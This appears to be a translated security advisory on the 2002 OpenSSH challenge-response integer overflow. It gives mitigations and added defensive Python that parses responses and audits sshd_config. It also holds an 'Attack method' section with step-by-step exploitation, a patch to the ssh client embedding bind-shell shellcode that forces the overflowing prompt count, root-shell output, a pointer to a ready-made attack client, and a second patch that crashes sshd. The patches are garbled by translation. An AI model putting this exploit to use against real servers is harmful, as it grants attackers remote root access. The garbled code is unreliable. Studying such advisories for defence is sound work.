Recommended procedures:
OpenSSH Versions 2.3.1p1 ~ 3.3
Description: OpenSSH vulnerability allows remote attackers to execute arbitrary code (updated)
Details: OpenSSH 2.3.1p1 through 3.3 contains security defects in its challenge-response authentication code that allow remote intruders to execute arbitrary instructions with the privileges of the sshd process (usually root). The first defect is an integer overflow in the variable that holds the number of responses received: when challenge-response authentication is enabled and the system uses the SKEY or BSD_AUTH authentication option, a remote attacker can use this defect to execute arbitrary instructions. This vulnerability has been confirmed. The second defect involves the PAM modules used for keyboard-interactive authentication (PAMAuthenticationViaKbdInt) in OpenSSH 2.3.1p1 through 3.3: regardless of the challenge-response setting, when the system uses these PAM modules there is a buffer overflow in a variable that holds the number of responses received, which may lead to remote unauthorized execution of instructions. There is currently no code confirming that this attack can be achieved. Attacks on both defects rely on features of SSH protocol version 2. Multiple Linux/UNIX platforms are affected by this vulnerability, and multiple Linux organizations and vendors have released security announcements.
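The integer overflow described above, modelled in added example code (not from the advisory, and not OpenSSH's own code): a 32-bit table-size computation that wraps for the oversized count quoted in the advisory's client patch, beside a hardened parser for the SSH2_MSG_USERAUTH_INFO_RESPONSE body that checks the response count against the prompts actually issued before allocating anything. The count-times-pointer-size allocation is an assumption about the vulnerable server code, which the page does not show; EXPECTED_PROMPTS and the sample bodies are constructed.

```python
import struct

EXPECTED_PROMPTS = 2   # prompts the server actually issued (constructed sample value)
PTR_SIZE = 4           # sizeof(char *) on the 32-bit targets the advisory mentions

def table_bytes_32bit(nresp: int) -> int:
    """Bytes a 32-bit server would allocate for nresp response pointers.
    The product wraps modulo 2**32: this is the overflow the advisory describes
    (assumed shape of the vulnerable allocation; the page shows no server code)."""
    return (nresp * PTR_SIZE) & 0xFFFFFFFF

def parse_info_response(payload: bytes, expected_prompts: int) -> list:
    """Hardened parse of a USERAUTH_INFO_RESPONSE body:
    uint32 count, then `count` SSH strings (uint32 length + bytes).
    The count is validated against the prompts actually issued *before*
    any allocation, so a forged count can never drive the table size."""
    if len(payload) < 4:
        raise ValueError("truncated count")
    (nresp,) = struct.unpack("!I", payload[:4])
    if nresp != expected_prompts:
        raise ValueError(f"response count {nresp} != prompts issued {expected_prompts}")
    off, responses = 4, []
    for _ in range(nresp):
        if len(payload) < off + 4:
            raise ValueError("truncated string length")
        (n,) = struct.unpack("!I", payload[off:off + 4])
        off += 4
        if len(payload) < off + n:
            raise ValueError("truncated string body")
        responses.append(payload[off:off + n])
        off += n
    if off != len(payload):
        raise ValueError("trailing bytes after last response")
    return responses

def ssh_string(b: bytes) -> bytes:
    """Encode bytes as an SSH string (uint32 big-endian length prefix)."""
    return struct.pack("!I", len(b)) + b

# Constructed sample bodies: a legitimate two-response body, and one carrying
# the count 1073741824 + 1024 that the advisory's client patch sends.
GOOD_BODY = struct.pack("!I", 2) + ssh_string(b"otp-resp-1") + ssh_string(b"otp-resp-2")
BAD_BODY = struct.pack("!I", 1073741824 + 1024) + ssh_string(b"x" * 10)

def check_bad_count() -> str:
    """Return the rejection reason the hardened parser gives for BAD_BODY."""
    try:
        parse_info_response(BAD_BODY, EXPECTED_PROMPTS)
    except ValueError as e:
        return str(e)
    return "accepted"
```

With the wrapped size the vulnerable server would reserve room for only 1024 pointers while believing it has 1073742848 responses to store; the hardened parser never reaches the allocation.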
Attack method:
1. Download openssh-3.2.2p1.tar.gz and extract it:
~$ tar -xvzf openssh-3.2.2p1.tar.gz
2. Apply the provided patch (save the patch segment below as a patch file):
~/openssh-3.2.2p1$ patch
3. Compile the patched OpenSSH client:
~/openssh-3.2.2p1$ ./configure && make ssh
4. Run ssh:
~/openssh-3.2.2p1$ ./ssh root:skey@localhost
5. If successful, connect to port 128:
~$ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)
(In addition, bugtraq.org offers a pre-patched SSH attack client: sshutup-theo.tar.gz)
--- Sshconnect2.c Sun Mar 31 20:49:39 2002 Evil-sshconnect2.c fri jun 28 19:22:12 2002 @@ -839, 6 839, 56 @@ / * * Parse Info_Request, prompt user and send INFO_RESPONSE * / int do_syscall (int nb_args, int syscall_num, ...); void shellcode (void) { int server_sock, client_sock, len; struct sockaddr_in server_addr; char rootshell [12 ], * Argv [2], * envp [1]; server_sock = do_syscall (3, 97, af_INET, SOCK_STREAM, 0); Server_addr.sin_addr.s_addr = 0; Server_addr.sin_port = 32768; Server_Addr. sin_family = AF_INET; do_syscall (3, 104, server_sock, (struct sockaddr *) & server_addr, 16); do_syscall (2, 106, server_sock, 1); client_sock = do_syscall (3, 30, server_sock, (struct sockaddr * ) & Server_addr, & len); do_syscall (2, 90, client_sock, 0); do_syscall (2, 90, client_sock, 1); do_syscall (2, 90, client_sock, 2); * (int *) ( Rootshell 0) = 0x6E69622F; * (INT *) (Rootshell 4) = 0x0068732F; * (INT *) (Rootshell 8) = 0; Argv [0] = R OOTSHELL; Argv [1] = 0; ENVP [0] = 0; DO_SYSCALL (3, 59, Rootshell, Argv, ENVP); } INT DO_SYSCALL (int NB_ARGS, INT SYSCALL_NUM, ...) { int R; ASM ( "MOV 8 (% EBP),% EAX;" "Add $ 3,% EAX;" "SHL $ 2,% EAX;" "Add% EBP,% EAX;" "MOV 8 (% EBP),% ECX;" "push_args:" "push (% EAX);" "SUB $ 4,% EAX;" "loop push_args;" "MOV 12 (% EBP), % EAX; " " Push $ 0; " "INT $ 0x80;" "MOV% EAX, -4 (% EBP)" ); return (RET); } void input_userauth_info_req (int type, u_int32_t seq, void * ctxt) {@@ -865, 7 915,7 @@ xfree (inst); xfree (lang); -.
num_prompts = packet_get_int (); num_prompts = 1073741824 1024; / * * Begin to build info response packet based on prompts requested * We commit to providing the correct number of responses, so if @@ -874,6 924,13 @@ * / packet_start (SSH2_MSG_USERAUTH_INFO_RESPONSE); packet_put_int (num_prompts); for (i = 0; i <1045; i ) packet_put_cstring ( " xxxxxxxxxx "); packet_put_string (shellcode, 2047); packet_send (); return; Debug2 ("INPUT_USERAUTH_INFO_REQ: NUM_PMPTS% D", NUM_PROMPTS); for (i = 0; I
Solution:
Upgrade OpenSSH to version 3.4.
http://www.openssh.com/txt/preauth.adv
Disable SSH protocol version 2 in /etc/ssh/sshd_config by adding this line:
Protocol 1
Disable challenge-response authentication: for OpenSSH 2.9 or later, the administrator can disable the challenge-response authentication option by adding a line in /etc/ssh/sshd_config:
ChallengeResponseAuthentication no
(it is set to yes by default)
Disable the PAM module in /etc/ssh/sshd_config:
PAMAuthenticationViaKbdInt no
Older releases (2.3.1p1 and 2.9) use two options:
KbdInteractiveAuthentication no
ChallengeResponseAuthentication no
Use privilege separation to minimize the impact, in /etc/ssh/sshd_config:
UsePrivilegeSeparation yes
Multiple UNIX platforms are affected by this vulnerability, and several UNIX vendors have already released security announcements:
Debian Security Advisory DSA-134-4
NetBSD Security Advisory SA2002-005
OpenPKG Security Advisory
SuSE Security Announcement
Trustix Secure Linux
Additional information: how to reproduce the OpenSSH overflow.
The R7 team did a little investigating into one of the OpenSSH vulnerabilities. The following are instructions on how to reproduce a segmentation violation in sshd (v3.2.3p1):
0.) Compile with PAM and S/Key support.
1.) Apply the following patch to the SSH client:
- --- Sshconnect2.c.bak thu jun 27 11:54:54 2002 sshconnect2.c Thu Jun 27 11:56:27 2002 @@ -866, 6 866 ,7 @@ xfree (lang); num_prompts = packet_get_int (); num_prompts = 2;.
/ ** Begin to build info response packet based on prompts requested * We commit to providing the correct number of responses, so if @@ -877,15 878,16 @@ DEBUG2 ("INPUT_USERAUTH_INFO_REQ: NUM_PROMPTS% D", NUM_PROMPTS); for (i = 0; i Response = read_passphrase (prompt, echo? rp_echo: 0); - - } packet_put_cstring (response); - - MEMSET (Response, 0, Strlen (Response)); / * Memset (Response, 0, Strlen (Response)) Xfree (response); - - xfree (prompt); xfree (prompt); * /} packet_check_eom (); / * done with paarsing incoming message. * /
2.) Add "PAMAuthenticationViaKbdInt yes" to 'sshd_config'.
3.) Connect to sshd using the modified client.
Note: valid credentials are not required.
On the server side, you'll see:
[root@wonderland hi_chad]# gdb /usr/sbin/sshd
GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run -d
Starting program: /usr/sbin/sshd -d
debug1: sshd version OpenSSH_3.2.3p1
debug1: private host key: #0 type 0 RSA1
debug1: read PEM private key done: type RSA
debug1: private host key: #1 type 1 RSA
debug1: read PEM private key done: type DSA
debug1: private host key: #2 type 2 DSA
socket: Address family not supported by protocol
debug1: Bind to port 22 on 0.0.0.0.
Server listening on 0.0.0.0 port 22.
Generating 768 bit RSA key.
RSA key generation complete.
debug1: Server will not fork when running in debugging mode.
Connection from 127.0.0.1 port 33208
debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1
debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1
debug1: list_hostkey_types: ssh-rsa,ssh-dss
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received
debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent
debug1: dh_gen_key: priv key bits set: 124/256
debug1: bits set: 1626/3191
debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT
debug1: bits set: 1597/3191
debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user jdog service ssh-connection method none
debug1: attempt 0 failures 0
debug1: Starting up PAM with username "jdog"
debug1: PAM setting rhost to "localhost.localdomain"
Failed none for jdog from 127.0.0.1 port 33208 ssh2
debug1: userauth-request for user jdog service ssh-connection method keyboard-interactive
debug1: attempt 1 failures 1
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=jdog devs=
debug1: kbdint_alloc: devices 'skey'
debug1: auth2_challenge_start: trying authentication method 'skey'
debug1: got 2 responses
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08053822 in strcpy ()
Comments are much appreciated.
--Joe
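An added example, not part of the advisory or of OpenSSH, that audits an sshd_config text for the settings the Solution section above names (ChallengeResponseAuthentication, PAMAuthenticationViaKbdInt, UsePrivilegeSeparation and Protocol). It takes the page's statement that ChallengeResponseAuthentication defaults to yes; the defaults assumed for an unset Protocol (2,1) and PAMAuthenticationViaKbdInt (no) are assumptions, and both sample config texts are constructed.

```python
import re

# Constructed sshd_config samples: one exposed, one hardened as the advisory recommends.
VULNERABLE_CONFIG = """
# constructed sample: default protocols, challenge-response and PAM kbd-int on
Protocol 2,1
ChallengeResponseAuthentication yes
PAMAuthenticationViaKbdInt yes
"""
HARDENED_CONFIG = """
# constructed sample: both vulnerable paths off, privilege separation on
Protocol 2
ChallengeResponseAuthentication no
PAMAuthenticationViaKbdInt no
UsePrivilegeSeparation yes
"""

def parse_sshd_config(text: str) -> dict:
    """Map lower-cased keyword -> value for the first occurrence of each keyword,
    which is the one sshd honours; comments and blank lines are skipped and
    '=' is accepted as a separator like sshd's own tokenizer does."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings

def audit_sshd_config(text: str) -> list:
    """Findings for the advisory's mitigations; unset keywords use the defaults
    noted in the lead-in (the 2,1 and no defaults are assumptions)."""
    s = parse_sshd_config(text)
    findings = []
    protocols = {p.strip() for p in s.get("protocol", "2,1").split(",")}
    if "2" in protocols:
        findings.append("info: protocol 2 enabled: both defects require SSH protocol 2")
    if s.get("challengeresponseauthentication", "yes").lower() == "yes":
        findings.append("risk: ChallengeResponseAuthentication is yes (the default); set it to no or upgrade to 3.4")
    if s.get("pamauthenticationviakbdint", "no").lower() == "yes":
        findings.append("risk: PAMAuthenticationViaKbdInt is yes; the PAM keyboard-interactive path is exposed")
    if s.get("useprivilegeseparation", "no").lower() != "yes":
        findings.append("risk: UsePrivilegeSeparation is not yes; an overflow runs with sshd's privileges")
    return findings
```

Run it over the real /etc/ssh/sshd_config of a 2.3.1p1 to 3.3 host to see which of the advisory's mitigations are still missing.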